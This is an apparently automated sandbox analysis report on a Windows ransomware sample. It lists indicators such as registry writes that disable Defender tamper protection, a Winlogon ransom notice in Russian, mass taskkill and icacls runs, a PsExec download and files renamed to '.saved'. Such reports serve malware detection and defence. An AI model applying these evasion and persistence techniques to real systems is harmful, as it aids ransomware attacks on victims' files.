34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89

Resubmissions

29-10-2021 09:15

211029-k7w6esdad6 10

24-08-2021 15:41

210824-hbt188jvma 10

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-en-20210920
submitted
29-10-2021 09:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Size

366KB
MD5

a24e438b9535cfb06f66dbd5b11a7680
SHA1

f998c708668743677064db9307cf274c17dd9a5a
SHA256

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89
SHA512

b65c5fac207297fe0219f03779729789de443880b1d71f099ec29a17183f37a1d9d8f1f2d4484f5fc95fa647562fd565e20a1f4a81b61d89e078a8405f41c5fa

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 15 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	15	http://live.sysinternals.com/PsExec.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\EnterEdit.tif.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\JoinClear.png => C:\Users\Admin\Pictures\JoinClear.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\JoinClear.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\JoinInitialize.png => C:\Users\Admin\Pictures\JoinInitialize.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\JoinInitialize.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\ConnectUnprotect.png => C:\Users\Admin\Pictures\ConnectUnprotect.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened for modification	C:\Users\Admin\Pictures\ConnectUnprotect.png.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File renamed	C:\Users\Admin\Pictures\EnterEdit.tif => C:\Users\Admin\Pictures\EnterEdit.tif.saved	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1776	icacls.exe
1760	icacls.exe
2024	icacls.exe
1664	icacls.exe
1536	icacls.exe
188	icacls.exe
936	icacls.exe
1752	icacls.exe
1948	icacls.exe
1516	icacls.exe
1240	icacls.exe
1624	icacls.exe
1752	icacls.exe
956	icacls.exe
1940	icacls.exe
612	icacls.exe
1808	icacls.exe
1156	icacls.exe
760	icacls.exe
1760	icacls.exe
1200	icacls.exe
1712	icacls.exe
1556	icacls.exe
1628	icacls.exe
1092	icacls.exe
1492	icacls.exe
1532	icacls.exe
1872	icacls.exe
640	icacls.exe
1928	icacls.exe
1544	icacls.exe
1604	icacls.exe
1816	icacls.exe
1240	icacls.exe
2024	icacls.exe
1144	icacls.exe
1976	icacls.exe
752	icacls.exe
1720	icacls.exe
1932	icacls.exe
1808	icacls.exe
1536	icacls.exe
1912	icacls.exe
1468	icacls.exe
1880	icacls.exe
1932	icacls.exe
1416	icacls.exe
1680	icacls.exe
1744	icacls.exe
1616	icacls.exe
1164	icacls.exe
936	icacls.exe
1540	icacls.exe
1400	icacls.exe
1644	icacls.exe
1720	icacls.exe
1696	icacls.exe
1656	icacls.exe
1320	icacls.exe
584	icacls.exe
1544	icacls.exe
1656	icacls.exe
996	icacls.exe
1524	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
File opened (read-only)	\??\S:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\L:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\B:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Q:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\R:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\U:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\G:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Z:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\N:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\M:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\W:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Y:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\J:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\E:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\H:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\O:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\P:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\A:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\F:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\K:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\X:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\T:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\I:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\V:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 icanhazip.com

flow	ioc
8	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1644	taskkill.exe
1664	taskkill.exe
1656	taskkill.exe
1308	taskkill.exe
1796	taskkill.exe
1164	taskkill.exe
896	taskkill.exe
1616	taskkill.exe
1720	taskkill.exe
1484	taskkill.exe
1416	taskkill.exe
1972	taskkill.exe
892	taskkill.exe
1876	taskkill.exe
1612	taskkill.exe
752	taskkill.exe
1872	taskkill.exe
652	taskkill.exe
1932	taskkill.exe
864	taskkill.exe
1728	taskkill.exe
1564	taskkill.exe
1148	taskkill.exe
1540	taskkill.exe
996	taskkill.exe
856	taskkill.exe
1624	taskkill.exe
2020	taskkill.exe
1912	taskkill.exe
1308	taskkill.exe
1212	taskkill.exe
1812	taskkill.exe
1648	taskkill.exe
976	taskkill.exe
1320	taskkill.exe
1444	taskkill.exe
1812	taskkill.exe
1556	taskkill.exe
1468	taskkill.exe
1760	taskkill.exe
1956	taskkill.exe
1424	taskkill.exe
1360	taskkill.exe
1432	taskkill.exe
1696	taskkill.exe
1644	taskkill.exe
1696	taskkill.exe
288	taskkill.exe
1144	taskkill.exe
668	taskkill.exe
540	taskkill.exe
1012	taskkill.exe
1584	taskkill.exe
1628	taskkill.exe
752	taskkill.exe
1388	taskkill.exe
1256	taskkill.exe
1252	taskkill.exe

Modifies registry class 20 IoCs

Processes:

splwow64.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_Classes\Local Settings	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	splwow64.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

324 reg.exe

pid	process
324	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

pid	process
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	1320	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	896	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1444	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	1468	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

pid	process
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

pid	process
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

splwow64.exe

pid process

1172 splwow64.exe

pid	process
1172	splwow64.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	pid	process	target process
PID 1088 wrote to memory of 1416	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1416	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1416	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1416	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1048	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1048	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1048	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1048	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 1088 wrote to memory of 1360	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 1360	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 1360	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 1360	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 1764	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 1764	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
